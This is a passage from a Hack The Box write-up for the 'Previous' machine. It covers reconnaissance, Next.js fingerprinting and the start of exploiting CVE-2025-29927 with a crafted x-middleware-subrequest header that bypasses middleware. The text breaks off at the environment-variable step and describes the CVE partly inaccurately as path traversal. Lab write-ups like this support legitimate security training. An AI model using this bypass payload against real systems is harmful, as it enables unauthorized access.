Hack The Box - HTB Previous Writeup - Medium - Weekly - August 23rd, 2025
Hack The Box: Previous - Complete Walkthrough & Technical Analysis
Machine Overview
| Property | Value |
|---|---|
| Machine Name | Previous |
| IP Address | [MACHINE_IP] |
| Operating System | Linux (Ubuntu) |
| Difficulty | Medium |
| Points | 30 |
| Release Date | August 23, 2025 |
| Domain | previous.htb |
Initial Reconnaissance
Port Scanning with Nmap
The first step in any penetration test is reconnaissance. We begin by scanning the target to identify open ports and services.
nmap -sC -sV -oN nmap_initial.txt [MACHINE_IP]
Key Findings:
- Port 22 (SSH): OpenSSH 8.9p1 Ubuntu - Standard SSH service for remote access
- Port 80 (HTTP): nginx 1.18.0 - Web server with automatic redirect to http://previous.htb/
DNS Configuration
Before proceeding, we need to add the domain to our hosts file:
echo "[MACHINE_IP] previous.htb" | sudo tee -a /etc/hosts
This ensures our system can resolve the domain name properly.
Web Application Analysis
Technology Stack Identification
Using whatweb to fingerprint the web application:
whatweb http://previous.htb
Critical Discovery: The application is running Next.js (a React framework) powered by Node.js. This is crucial because Next.js applications have specific vulnerabilities and attack vectors.
HTTP Header Analysis
curl -I http://previous.htb/
Response Headers Reveal:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
X-Powered-By: Next.js
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware...
The X-Middleware-Subrequest header is particularly interesting - it suggests the application uses middleware layers that might be exploitable.
Directory Enumeration
feroxbuster -u http://previous.htb/ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-x php,html,js,json,txt,log \
-t 50 -e

Important Finding: Email address discovered - jeremy@previous.htb (potential username for later)

We check the website headers.

Since it's Next.js, it might be vulnerable to CVE-2025-29927 (PoC exists) depending on the version/config.
Vulnerability Discovery: CVE-2025-29927
Understanding the Vulnerability
CVE-2025-29927 is a path traversal vulnerability in Next.js applications that allows attackers to read arbitrary files from the server when certain conditions are met:
- The application has an API endpoint that accepts file parameters
- The middleware doesn't properly sanitize user input
- The X-Middleware-Subrequest header can be manipulated
Why This Works
Next.js middleware is designed to process requests before they reach the actual API endpoints. By manipulating the middleware chain through the X-Middleware-Subrequest header, we can bypass security controls.
Exploitation Phase 1: Information Gathering
Step 1: Discovering the Vulnerable Endpoint
We need to find API endpoints. The /api/ directory is standard in Next.js applications:
dirsearch -u http://previous.htb/api/ \
-w /usr/share/wordlists/dirb/common.txt \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
Result: Found /api/download endpoint

Step 2: Reading Environment Variables
Environment variables often contain sensitive information like API keys, database credentials, or configuration details: